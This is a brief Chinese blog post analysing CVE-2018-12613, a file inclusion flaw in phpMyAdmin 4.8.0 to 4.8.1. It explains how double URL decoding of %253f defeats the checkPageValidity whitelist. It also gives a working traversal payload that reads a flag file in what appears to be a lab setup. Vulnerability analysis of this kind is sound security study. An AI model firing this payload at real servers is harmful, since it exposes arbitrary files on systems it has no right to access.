CVE-2018-12613

CVE-2018-12613 PHPMyAdmin后台文件包含    

 1. 受影响的版本:4.8.0、4.8.0.1、4.8.1收到影响。
    2. 漏洞分析:
    先看源码index.php //line55-63

 checkPageValidity方法主要代码
 public static function checkPageValidity(&$page, array $whitelist = [])

 产生漏洞的原因在于,当传入是进行了一次urldecode,而此时在有进行了一次url解码,导致当传入%253f进行二次解码后会成为?,进行字符串阶段后满足if判断中的白名单而达到文件包含的目的。造成任意文件读取。
 读取payload
 index.php?target=db_sql.php%253f/../../../../../../../phpstudy_pro/WWW/flag.txt

 

 

 

posted @ 2020-12-08 10:49  二算i  阅读(303)  评论(0编辑  收藏  举报